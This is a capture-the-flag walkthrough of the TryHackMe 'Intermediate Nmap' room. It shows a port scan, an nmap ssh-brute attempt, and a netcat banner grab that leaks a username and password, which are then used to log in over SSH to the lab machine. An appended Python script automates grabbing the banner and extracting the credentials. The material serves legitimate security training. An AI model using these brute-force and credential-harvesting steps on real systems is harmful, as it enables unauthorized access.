Walkthrough: Intermediate Nmap - TryHackMe.
The room's task reads: "You've learned some great nmap skills! Now, can you combine that with other skills, with netcat and protocols, to log in to this machine and find the flag? This VM (MACHINE_IP) is listening on a high port, and if you connect to it, it may give you some information you can use to connect to a lower port commonly used for remote access!"
First, I looked for open ports with a TCP connect scan (the default top 1000 ports, which include 2222 and 31337):
┌──(kali㉿kali)-[~/Documents]
└─$ nmap -sT 10.10.250.39 -vv
Those were:
PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack
2222/tcp  open  EtherNetIP-1 syn-ack
31337/tcp open  Elite        syn-ack
Note that without -sV the SERVICE column is just nmap's port-number lookup table (31337 is listed as "Elite", 2222 as "EtherNetIP-1"); nothing has actually been fingerprinted, so the names say nothing about what is really listening there.
Then, since I had recently learnt about nmap scripts, I first decided to try brute-forcing SSH:
┌──(kali㉿kali)-[~/Documents]
└─$ nmap -p 22 10.10.250.39 --script ssh-brute
but wasn't able to get the credentials this way. That is expected here: ssh-brute works from nmap's default username and password lists, and the password on this box is not in any of them.
So I followed the instructions and interacted with TCP port 31337 with netcat (-n skips DNS resolution; the service sends its data as soon as you connect, no request needed):
netcat -n 10.10.250.39 31337
which returned:
In case I forget - user:pass ubuntu:Dafdas!!/str0ng
With these credentials I was able to log in via SSH on port 22, the "lower port commonly used for remote access" from the task text:
┌──(kali㉿kali)-[~/Documents]
└─$ ssh ubuntu@10.10.250.39
and navigate to the flag.txt file.
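The whole chain (connect to the high port, read what it volunteers, pull the user:pass pair out of the banner, build the SSH command) can be scripted. The following is an added example, not part of the original walkthrough or of the TryHackMe room: it assumes the banner keeps the "user:pass USER:PASSWORD" layout seen above, and the sample banner embedded in it is constructed from that output so the parser can be exercised offline.

```python
import re
import shlex
import socket
import sys

# Constructed sample, copied from the shape of the banner port 31337 returned.
SAMPLE_BANNER = "In case I forget - user:pass ubuntu:Dafdas!!/str0ng\n"

# Assumed layout: the literal "user:pass", whitespace, then USER:PASSWORD.
# The username is matched lazily so the first ':' splits user from password;
# everything after it (including further ':' or '!' characters) is the password.
CRED_RE = re.compile(r"user:pass\s+(?P<user>\S+?):(?P<password>\S+)")


def grab_banner(host: str, port: int, timeout: float = 5.0) -> str:
    """Connect, send nothing, and collect whatever the service pushes at us.

    Reads until the peer closes or goes quiet for `timeout` seconds, so a
    service that keeps the socket open after its greeting does not hang us.
    """
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            while True:
                data = sock.recv(4096)
                if not data:        # peer closed the connection
                    break
                chunks.append(data)
        except socket.timeout:      # peer went quiet: treat as end of banner
            pass
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_credentials(banner: str):
    """Return (user, password) from a banner, or None if no pair is present."""
    match = CRED_RE.search(banner)
    if match is None:
        return None
    return match.group("user"), match.group("password")


def ssh_command(host: str, creds) -> str:
    """Build the login command; the password is typed at ssh's own prompt."""
    user, _password = creds
    return f"ssh {shlex.quote(user)}@{host}"


if __name__ == "__main__":
    # Usage: python3 grab.py <host> <port>
    target, high_port = sys.argv[1], int(sys.argv[2])
    banner = grab_banner(target, high_port)
    print(banner.rstrip())
    creds = parse_credentials(banner)
    if creds is None:
        sys.exit("no user:pass pair found in banner")
    print(f"user={creds[0]} password={creds[1]}")
    print("login with:", ssh_command(target, creds))
```

One caveat when reusing the harvested password on the command line: it contains "!!", which an interactive bash shell expands as history substitution before any program sees it. Typing it at ssh's own password prompt is safe (ssh reads it directly), but if it is ever passed as an argument, for instance to sshpass, wrap it in single quotes.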